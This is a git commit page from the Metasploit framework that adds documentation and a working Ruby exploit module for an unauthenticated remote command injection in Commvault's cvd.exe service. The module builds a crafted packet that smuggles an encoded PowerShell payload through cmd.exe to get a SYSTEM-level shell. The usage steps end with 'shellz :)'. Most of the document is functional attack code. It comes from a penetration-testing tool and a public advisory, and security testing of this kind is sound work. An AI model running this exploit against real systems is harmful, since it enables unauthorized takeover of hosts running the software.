Land #9340, Add exploit for Commvault Remote Command Injection
Land #9340MS-2855/keylogger-mettle-extension
commit
d138f1508c
|
@ -0,0 +1,21 @@
|
|||
## Vulnerable Application
|
||||
|
||||
|
||||
This module exploits a remote command injection vulnerability in the Commvault Communications service (cvd.exe). Exploitation of this vulnerability can allow for remote command execution as SYSTEM.
|
||||
|
||||
|
||||
Additional information can be found [here](https://www.securifera.com/advisories/sec-2017-0001/)
|
||||
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
|
||||
2. `use exploit/windows/misc/commvault_cmd_exec`
|
||||
|
||||
3. `set RHOST [ip]`
|
||||
|
||||
4. `exploit`
|
||||
|
||||
5. shellz :)
|
|
@ -0,0 +1,98 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/exploit/powershell'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Powershell
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Commvault Communications Service (cvd) Command Injection',
|
||||
'Description' => %q{
|
||||
This module exploits a command injection vulnerability
|
||||
discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
|
||||
and v10). The vulnerability exists in the cvd.exe service and allows an
|
||||
attacker to execute arbitrary commands in the context of the service. By
|
||||
default, the Commvault Communications service installs and runs as SYSTEM in
|
||||
Windows and does not require authentication. This vulnerability was discovered
|
||||
in the Windows version. The Linux version wasn't tested.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
|
||||
{
|
||||
'Arch' => [ARCH_X64, ARCH_X86]
|
||||
}
|
||||
],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Dec 12 2017'))
|
||||
|
||||
register_options([Opt::RPORT(8400)])
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
buf = build_exploit
|
||||
print_status("Connecting to Commvault Communications Service.")
|
||||
connect
|
||||
print_status("Executing payload")
|
||||
#Send the payload
|
||||
sock.put(buf)
|
||||
#Handle the shell
|
||||
handler
|
||||
disconnect
|
||||
|
||||
end
|
||||
|
||||
|
||||
def build_exploit
|
||||
|
||||
#Get encoded powershell of payload
|
||||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
|
||||
#Remove additional cmd.exe call
|
||||
psh = "powershell"
|
||||
idx = command.index(psh)
|
||||
command = command[(idx)..-1]
|
||||
|
||||
#Build packet
|
||||
cmd_path = 'C:\Windows\System32\cmd.exe'
|
||||
msg_type = 9
|
||||
zero = 0
|
||||
payload = ""
|
||||
payload += make_nops(8)
|
||||
payload += [msg_type].pack('I>')
|
||||
payload += make_nops(328)
|
||||
payload += cmd_path
|
||||
payload += ";"
|
||||
payload += ' /c "'
|
||||
payload += command
|
||||
payload += '" && echo '
|
||||
payload += "\x00"
|
||||
payload += [zero].pack('I>')
|
||||
|
||||
#Add length header and payload
|
||||
ret_data = [payload.length].pack('I>')
|
||||
ret_data += payload
|
||||
|
||||
ret_data
|
||||
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue